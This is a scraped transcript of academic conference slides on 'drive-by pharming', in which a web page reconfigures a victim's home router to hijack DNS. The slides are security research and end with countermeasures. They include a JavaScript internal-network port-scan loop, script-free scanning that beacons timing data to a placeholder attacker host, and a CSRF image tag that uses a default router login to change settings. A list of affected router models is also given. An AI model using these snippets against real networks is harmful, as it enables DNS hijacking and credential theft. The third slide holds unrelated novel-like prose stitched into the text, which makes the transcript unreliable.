drive-by pharming - sid stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf ·...

38
Drive-By Pharming Sid Stamm :: Indiana University Zulfikar Ramzan :: Symantec Corporation Markus Jakobsson :: Indiana University

Upload: others

Post on 14-Jul-2020

13 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Drive-By PharmingSid Stamm :: Indiana University

Zulfikar Ramzan :: Symantec CorporationMarkus Jakobsson :: Indiana University

Page 2: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Phishing

Page 3: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Phishing

Following these, the cycle would start again. aylesbury beseech "Well, we'll have to talk about that, won't we? What he had burned had been nothing more than an illusion with a title page on top” blank pages interspersed with written rejects and culls. at least, not all of them. She killed him. "Her voice was rising. A jury might let you off by reason of insanity, but not me, Annie. Not that I would ever try to change your mind about anything you chose to think” a Mister Smart Guy like you who thinks for a living. It had taken her less than twenty minutes to read his first stab at it; it had been an hour since she had taken this sheaf of twenty-one pages. caricature

Page 4: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Phishing

Page 5: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Crimeware

More Info: http://www.apwg.org

Page 6: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Pharming

Page 7: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Browser Problems

Page 8: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Browser History Snooping

http://browser-recon.info

Page 9: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Browser History Snooping

http://browser-recon.info

Page 10: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

XSS

Page 11: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

CSRF

http://sidstamm.com/netflixcsrf.html

Page 12: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Host Scanning

Attacking from Victim’s Browser

evil code

x

x

x

x

!

Page 13: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Host Scanningwindow.onerror = function(msg, url) { if(!msg.match(/Error loading script/)){ serverIsLive(url); }};

for(i=0; i<255; i++) { s = document.createElement(“script”); s.src = “http://192.168.0.” + i; document.body.appendChild(s);}

http://www.spidynamics.com/spilabs/education/articles/JS-portscan.html

Page 14: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Script-Free Scanning

<img src="http://attacker/record-time/?id=a" /><link rel="stylesheet" type="text/css" href="http://192.168.0.1/" /><img src="http://attacker/record-time/?id=b" /><link rel="stylesheet" type="text/css" href="http://192.168.0.2/" /><img src="http://attacker/record-time/?id=c" />

...

http://jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning-without.html

Page 15: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Router Woes

• GET v. POST

• admin:admin

• partial submit

• predictability

Page 16: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Drive-By Pharming

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

Page 17: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Normal DNS Lookup

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

Page 18: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Normal DNS Lookup

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

LOOKUP evil.com

Page 19: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Normal DNS Lookup

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

LOOKUP evil.com

Evil.com=1.1.1.1

Page 20: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Drive-By Attack

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

Page 21: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Drive-By Attack

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

GET 1.1.1.1

Page 22: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Pharmed DNS Lookup

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

Page 23: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Pharmed DNS Lookup

ISP™

ISP™

Attacker’sDNS + Web Server

ISP’s DNSServer

ISP’s Gateway

Victim

Router’s Internal Net

LOOKUP

Page 24: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

How This Happens

POST -> GET

( PRE-ARRANGED )

Page 25: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

How This Happens

<img src=“http://admin:@192.168.0.1/cfg.cgi?...”>

( CSRF )

Page 27: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

FalloutNetgear WGR614

D-Link DI-524Linksys WRT54G

Page 28: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

http://www.cisco.com/warp/public/707/cisco-sr-20070215-http.shtml

Cisco 806 Cisco 826 Cisco 827

Cisco 827H Cisco 827-4v

Cisco 828 Cisco 831 Cisco 836 Cisco 837

Cisco SOHO 71 Cisco SOHO 76 Cisco SOHO 77

Cisco SOHO 77H Cisco SOHO 78 Cisco SOHO 91 Cisco SOHO 96 Cisco SOHO 97

...

FalloutNetgear WGR614

D-Link DI-524Linksys WRT54G

Page 29: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Router Zombie Networks?

Page 30: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Router Zombie Networks?

Page 31: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Viral Spread

...

Page 32: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Viral Spread

...

Page 33: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Countermeasures

Page 34: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Countermeasures

Page 35: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Countermeasures

Page 36: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Countermeasures

Page 37: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Countermeasures

ISP

Page 38: Drive-By Pharming - Sid Stammresearch.sidstamm.com/papers/driveby-pharming-icics-slides.pdf · Drive-By Pharming ISP ISP Attacker’s DNS + Web Server ISP’s DNS Server ISP’s Gateway

Drive-By Pharming